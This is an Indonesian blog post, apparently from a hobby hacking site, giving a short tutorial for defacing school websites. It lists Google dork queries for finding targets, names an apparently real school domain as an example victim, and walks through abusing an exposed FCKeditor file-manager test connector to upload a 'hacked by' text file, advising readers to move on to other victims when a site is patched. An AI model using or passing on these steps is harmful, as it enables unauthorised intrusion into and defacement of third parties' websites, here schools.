walau situs sekolah tapi defacean kita ini ngak merusak pastinya =))
Okeh, Langsung saja ke tutorial pendeknya sob.
1. Buat sebuah file dengan sebuah notepad lalu tulislah kata kata yang ingin dsampaikan didalamnya misalnya hacked by lablabla =)) lalu save dengan format .txt
2. Buka google dan ketikan salah satu kode dork berikut di pencarian :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
3. kemudian pilih/Klik salah satu dari hasil pencarian tersebut.
Contoh URL yang didapat : http://smkn1kuta.sch.id/html/siswa.php
4. Kemudian ganti url target tersebut dengan exploit berikut di akir domainya :
/editor/filemanager/connectors/test.html
Jadinya seperti ini:
http://smkn1kuta.sch.id/editor/filemanager/connectors/test.html
Misalkan terjadi error brarti wb tersebut sudah di patch oleh admin nya, silahkan cari kembali korban yang lain di hasil pencarian google tadi.
5. Jika behasil Ganti connector tersebut menjadi PHP
6. Silahkan browse/cari file .txt yg tadi sudah kita buat tadi, dan terakhir klik Upload.
sip, file udah masuk =))
Untuk lokasi file yang sudah di upload tadi berada di:
http://url_target/userfiles/file/nama_file.txt
Hasilny seperti ini :
http://smkn1kuta.sch.id/userfiles/file/-(1).txt
Sekian... semogga sukses.
0 komentar:
Posting Komentar
Terima Kasih Telah Berkunjung
Berkomentarlah Dengan Sopan !